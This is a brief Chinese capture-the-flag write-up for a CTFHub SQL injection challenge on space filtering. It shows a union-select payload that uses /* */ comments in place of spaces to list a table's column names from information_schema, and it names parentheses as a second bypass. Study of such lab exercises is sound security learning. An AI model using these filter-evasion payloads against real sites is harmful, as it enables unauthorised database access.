1、解题

这道题的做法主要就是找到绕过过滤空格的办法,我用的是 "/* /" 注释来代理空格,做法还是和整数型 一样的,所以我就放一个语句和截图就好了
查询列名的语句:
-1/
/union/ /select/ /1,group_concat(column_name)/ /from/ /information_schema.columns/ /where/ */table_name=‘xgnrvtplde’
CTHHub Web技能树-sql注入-空格过滤

2、空格绕过方法

1、最基本的绕过方式就是使用/* */的方式来绕过,就是题目中的那样
2、如果过滤了空格,但是没有过滤掉空格时,可通过()的方式来绕过。

相关文章:

  • 2022-12-23
  • 2021-11-07
  • 2022-01-01
  • 2021-04-23
  • 2021-07-05
  • 2022-12-23
  • 2021-06-20
  • 2021-07-21
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-07-14
  • 2021-06-23
  • 2021-06-08
  • 2022-01-14
  • 2022-12-23
相关资源
相似解决方案